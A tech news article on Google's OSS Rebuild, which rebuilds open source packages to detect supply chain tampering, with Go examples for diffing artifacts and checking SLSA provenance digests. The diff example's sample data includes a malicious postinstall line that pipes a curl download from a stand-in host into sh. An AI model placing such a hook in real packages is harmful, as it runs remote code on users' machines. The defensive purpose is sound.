
Open source software runs pretty much everything these days, but with that popularity comes risk: attackers have learned that slipping malicious code into one popular package can compromise thousands of downstream systems in one shot. Now Google is stepping in with a new initiative called OSS Rebuild, and it could be a game changer for developers and security teams alike.
Matthew Suozzo from Google’s Open Source Security Team introduced OSS Rebuild as a way to “strengthen trust in open source package ecosystems by reproducing upstream artifacts.” In practice that means rebuilding packages published on PyPI, npm, and Crates.io from their source and checking that the result matches the artifact the registry actually serves. If the two don’t line up, that mismatch is a signal worth investigating.
“OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers,” Suozzo said. That’s a key point. The tool works behind the scenes, without putting extra work on the people who publish and maintain open source packages. It automatically generates build definitions, creates provenance metadata following the SLSA Build Level 3 standard, and flags anything suspicious.
This kind of system might have caught incidents like the backdoor in xz-utils or the malicious code injected into @solana/web3.js. OSS Rebuild looks for several types of supply chain threats, including stealthy backdoors, build environment compromises, and published packages that contain code not found in the public source repository. It even monitors for suspicious behavior during the build process, something that manual review rarely catches.
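The core check behind the threats listed above is simple to state: unpack the artifact the registry serves, unpack a fresh rebuild from the public source, and diff them file by file. The Go program below is an added example written for this article, not code from the OSS Rebuild project; the package contents are constructed in memory, and the “postinstall.js” file stands in for the kind of injected code a rebuild would expose. Comparing per-file digests rather than one digest over the whole archive is a deliberate choice: it tolerates archive metadata such as timestamps that often differ between builds, while still flagging any byte-level change to actual files.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sort"
)

// Report lists how a published artifact differs from a rebuild of the same version.
type Report struct {
	OnlyInPublished []string // files shipped by the registry with no counterpart in the rebuild
	OnlyInRebuilt   []string // files produced by the rebuild that the registry artifact lacks
	Modified        []string // files present in both whose contents differ
}

// Identical reports whether the rebuild reproduced the published artifact exactly.
func (r Report) Identical() bool {
	return len(r.OnlyInPublished) == 0 && len(r.OnlyInRebuilt) == 0 && len(r.Modified) == 0
}

func digest(b []byte) string {
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// CompareArtifacts diffs two unpacked archives (path -> file contents) file by file.
// Results are sorted so the report is deterministic.
func CompareArtifacts(published, rebuilt map[string][]byte) Report {
	var r Report
	for path, content := range published {
		other, ok := rebuilt[path]
		switch {
		case !ok:
			r.OnlyInPublished = append(r.OnlyInPublished, path)
		case digest(content) != digest(other):
			r.Modified = append(r.Modified, path)
		}
	}
	for path := range rebuilt {
		if _, ok := published[path]; !ok {
			r.OnlyInRebuilt = append(r.OnlyInRebuilt, path)
		}
	}
	sort.Strings(r.OnlyInPublished)
	sort.Strings(r.OnlyInRebuilt)
	sort.Strings(r.Modified)
	return r
}

// PublishedSample is a constructed stand-in for an npm tarball fetched from the registry.
// It carries an extra install hook and a postinstall script that never existed upstream.
var PublishedSample = map[string][]byte{
	"package.json":       []byte(`{"name":"example","version":"1.2.3","scripts":{"postinstall":"node lib/postinstall.js"}}`),
	"lib/index.js":       []byte("module.exports = function add(a, b) { return a + b; };\n"),
	"lib/postinstall.js": []byte("require('child_process').exec('curl -s https://example.invalid/x | sh');\n"),
}

// RebuiltSample is a constructed stand-in for the same version rebuilt from the public source.
var RebuiltSample = map[string][]byte{
	"package.json": []byte(`{"name":"example","version":"1.2.3"}`),
	"lib/index.js": []byte("module.exports = function add(a, b) { return a + b; };\n"),
}

func main() {
	r := CompareArtifacts(PublishedSample, RebuiltSample)
	if r.Identical() {
		fmt.Println("rebuild reproduces the published artifact")
		return
	}
	fmt.Println("MISMATCH: published artifact does not match rebuild")
	for _, p := range r.OnlyInPublished {
		fmt.Printf("  only in published: %s\n", p)
	}
	for _, p := range r.OnlyInRebuilt {
		fmt.Printf("  only in rebuild:   %s\n", p)
	}
	for _, p := range r.Modified {
		fmt.Printf("  modified:          %s\n", p)
	}
}
```

Run with `go run .` and the report names both the injected `lib/postinstall.js` and the altered `package.json`; a clean rebuild yields an empty report. In a real pipeline the two maps would be populated by unpacking the registry tarball and the rebuild output.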
And if this sounds familiar, that’s because we just covered something similar in our report on malicious AUR packages in Arch Linux. Open source isn’t immune to attack, and OSS Rebuild is another reminder that we can’t blindly trust package managers anymore.
The project is already rebuilding thousands of packages from PyPI, npm, and Crates.io. Even better, you can test it yourself. Google has released a Go-based CLI that lets you fetch provenance metadata or even rebuild packages manually. Here’s a taste:
go install github.com/google/oss-rebuild/cmd/oss-rebuild@latest
oss-rebuild get cratesio syn 2.0.39
oss-rebuild list pypi absl-py
You can even rebuild a package inside Docker with a single command:
oss-rebuild get npm lodash 4.17.20 --format=dockerfile | \
docker run $(docker buildx build -q -)
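Fetching provenance is only half the job: the attestation is useful once you bind it to the artifact you actually installed. SLSA provenance is an in-toto Statement whose `subject` lists the artifact name and its digest, so the practical check is to hash your local copy and compare it with that digest. The Go program below is an added example for this article, not part of the OSS Rebuild CLI; it constructs a sample statement in memory and assumes the bare Statement JSON is at hand, leaving DSSE envelope signature verification out of scope.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// SLSAProvenanceV1 is the predicateType of a SLSA v1 provenance attestation.
const SLSAProvenanceV1 = "https://slsa.dev/provenance/v1"

// Statement is the in-toto attestation framing around the SLSA predicate.
type Statement struct {
	Type          string         `json:"_type"`
	PredicateType string         `json:"predicateType"`
	Subject       []Subject      `json:"subject"`
	Predicate     map[string]any `json:"predicate"`
}

// Subject names one artifact the attestation makes claims about.
type Subject struct {
	Name   string            `json:"name"`
	Digest map[string]string `json:"digest"`
}

// Sha256Hex returns the lowercase hex SHA-256 of b, the form used in subject digests.
func Sha256Hex(b []byte) string {
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// VerifySubject checks that statementJSON is a SLSA v1 provenance whose subject
// named artifactName carries the SHA-256 of the artifact bytes we actually hold.
func VerifySubject(statementJSON, artifact []byte, artifactName string) error {
	var st Statement
	if err := json.Unmarshal(statementJSON, &st); err != nil {
		return fmt.Errorf("parse statement: %w", err)
	}
	if st.PredicateType != SLSAProvenanceV1 {
		return fmt.Errorf("unexpected predicateType %q", st.PredicateType)
	}
	want := Sha256Hex(artifact)
	for _, s := range st.Subject {
		if s.Name != artifactName {
			continue
		}
		got, ok := s.Digest["sha256"]
		if !ok {
			return errors.New("subject has no sha256 digest")
		}
		if got != want {
			return fmt.Errorf("digest mismatch for %s: provenance %s, local %s", artifactName, got, want)
		}
		return nil // the provenance really is about the bytes we have
	}
	return fmt.Errorf("no subject named %q in statement", artifactName)
}

// SampleStatement builds a constructed provenance statement for testing; the predicate
// body is a placeholder, not a real build definition.
func SampleStatement(name, predicateType, sha256Hex string) []byte {
	st := Statement{
		Type:          "https://in-toto.io/Statement/v1",
		PredicateType: predicateType,
		Subject:       []Subject{{Name: name, Digest: map[string]string{"sha256": sha256Hex}}},
		Predicate:     map[string]any{"buildDefinition": map[string]any{"buildType": "constructed-example"}},
	}
	b, _ := json.Marshal(st)
	return b
}

func main() {
	artifact := []byte("constructed artifact bytes standing in for a downloaded tarball")
	name := "example-1.2.3.tgz"

	good := SampleStatement(name, SLSAProvenanceV1, Sha256Hex(artifact))
	fmt.Println("matching artifact:", VerifySubject(good, artifact, name))

	// A swapped artifact fails even though the provenance itself is well formed.
	tampered := append([]byte{}, artifact...)
	tampered = append(tampered, '!')
	fmt.Println("tampered artifact:", VerifySubject(good, tampered, name))
}
```

Hash the file you installed, not the one you downloaded earlier and may have since rebuilt or cached; the point is to tie the claim in the provenance to the exact bytes in use.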
Suozzo said the long-term vision is bigger than any one ecosystem. “We are committed to bringing supply chain transparency and security to all open source software development,” he wrote. And while the current focus is on Python, JavaScript, and Rust, the infrastructure can be expanded to cover other languages and registries over time.
Google is also experimenting with using AI to help understand build instructions written in natural language. According to Suozzo, early tests show promise: “Our initial experiments have demonstrated the approach’s viability in automating exploration and testing, with limited human intervention, even in the most complex builds.”
OSS Rebuild doesn’t replace other security tools, but it does fill a major gap. It lets you verify that the packages you rely on were actually built from their published source, even if the maintainers never added build provenance themselves. It also adds extra value to SBOMs by enriching them with reproducible build data.
If you want to check it out or contribute, the project is live on GitHub at github.com/google/oss-rebuild. You can also learn more about the provenance framework at slsa.dev.